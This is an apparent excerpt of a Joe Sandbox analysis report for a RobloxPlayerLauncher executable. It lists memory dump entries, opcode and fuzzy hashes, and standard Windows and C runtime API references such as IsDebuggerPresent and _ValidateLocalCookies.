              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: H_prolog3
              • String ID:
              • API String ID: 431132790-0
              • Opcode ID: b922c9579dd5b34488ea0d5898c1d33375b5e33d0c8a12c44c1013db59866f3d
              • Instruction ID: 925cb56afe998688b363f45819e551665b41c3fba622edb0eedd23095eef86ec
              • Opcode Fuzzy Hash: b922c9579dd5b34488ea0d5898c1d33375b5e33d0c8a12c44c1013db59866f3d
              • Instruction Fuzzy Hash: 54E01A72C1020E9BCF00DFE8C542BEFB7B8AF08300F508026A211E7140EB3893858BA1
              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 009FB68B
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 009FB695
              • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,?), ref: 009FB6A2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID: |_j
              • API String ID: 3906539128-3413345523
              • Opcode ID: 6a26552a4440e73439500d1a48764ccc76f0a244457c5981afa8606fcd1d49b3
              • Instruction ID: 56634dca275dba299a7efeef2505fac9396344423854847f2d627a54b7ac1493
              • Opcode Fuzzy Hash: 6a26552a4440e73439500d1a48764ccc76f0a244457c5981afa8606fcd1d49b3
              • Instruction Fuzzy Hash: 8631C47590122C9BCB21DF64D88979DBBB8BF48310F5041EAE50CA7261E7749F858F44
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00A15858
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: 12cbc5831da4e7d0d4b7b6a4b2b2d4e7c0f6aea56ff0a1b460fdf8e87ee22fb8
              • Instruction ID: 376c1e457c6135805f8637e33fafa7c6a739b141702d0a6fae4abd56ff711aab
              • Opcode Fuzzy Hash: 12cbc5831da4e7d0d4b7b6a4b2b2d4e7c0f6aea56ff0a1b460fdf8e87ee22fb8
              • Instruction Fuzzy Hash: C1B13E35A10A09DFD719CF28C486BA57BE1FF85364F298658E899CF2A1C335E991CF40
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9532f4950ef85930ce68b9e42bf3a45de2579ba7eb0b500e5035a8a677a43d02
              • Instruction ID: 7b389e6266e3955a3958a6be6ba79c1982dfa0084aeb81b21677b10a109823c0
              • Opcode Fuzzy Hash: 9532f4950ef85930ce68b9e42bf3a45de2579ba7eb0b500e5035a8a677a43d02
              • Instruction Fuzzy Hash: 46E08C32A11228EBCB14DBD8DA04DCAF7ECEB44B50B1540A6F501D3100D270DE40DBD0
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aabcca1a103a74f101aa2a2089a7863622b70a41a57d6717e2ede07f69ceffea
              • Instruction ID: 699a181c78f2c40116d1f4ca9c27778418c5f298531db8fbe01de6eb478367dc
              • Opcode Fuzzy Hash: aabcca1a103a74f101aa2a2089a7863622b70a41a57d6717e2ede07f69ceffea
              • Instruction Fuzzy Hash: B4C08C38080D0056CE298F1886B13E43364B3B9782F80058CC9070BA42C51E9CC3DA00
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 009F8B67
              • ___except_validate_context_record.LIBVCRUNTIME ref: 009F8B6F
              • _ValidateLocalCookies.LIBCMT ref: 009F8BF8
              • __IsNonwritableInCurrentImage.LIBCMT ref: 009F8C23
              • _ValidateLocalCookies.LIBCMT ref: 009F8C78
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
              • String ID: csm$|_j
              • API String ID: 1170836740-694016560
              • Opcode ID: 2c12122cf559e0f459a15a94cbb755a2920fceb8155cd622c3fbfd75b53af4f2
              • Instruction ID: efaa541aab38a7c66667072498aab87d024001c8f2159e70eceae843f27a7984
              • Opcode Fuzzy Hash: 2c12122cf559e0f459a15a94cbb755a2920fceb8155cd622c3fbfd75b53af4f2
              • Instruction Fuzzy Hash: 4041E434A0020DAFCF10DF68C895ABFBBB9EF45314F1480A5EA159B392DB31E951CB91
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6AE65F7C,?,?,00000000,00A3D7C8,000000FF,?,00A140E1,00000002,?,00A140B5,00A05409), ref: 00A14143
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A14155
              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00A3D7C8,000000FF,?,00A140E1,00000002,?,00A140B5,00A05409), ref: 00A14177
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll$|_j
              • API String ID: 4061214504-3688644886
              • Opcode ID: 32219f64e39d039cae0c6341bf9f8f7821ae3fd05ed12331de6c025d75b9ca61
              • Instruction ID: 9ae7b31cec19d03e35d8eac1b69eac6aef32e6d5a7a8517c8a5557f6bd46480e
              • Opcode Fuzzy Hash: 32219f64e39d039cae0c6341bf9f8f7821ae3fd05ed12331de6c025d75b9ca61
              • Instruction Fuzzy Hash: 5001D679914669FFDB128F94DC05FEEB7F8FB49B11F000625F811A22A0DBB59981CA90
              APIs
              • __freea.LIBCMT ref: 00A1CED5
                • Part of subcall function 00A1A2F8: RtlAllocateHeap.NTDLL(00000000,00A053D6,00A19E0E,?,00A137ED,00B474D8,00000018,00000003), ref: 00A1A32A
              • __freea.LIBCMT ref: 00A1CEEA
              • __freea.LIBCMT ref: 00A1CEFA
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
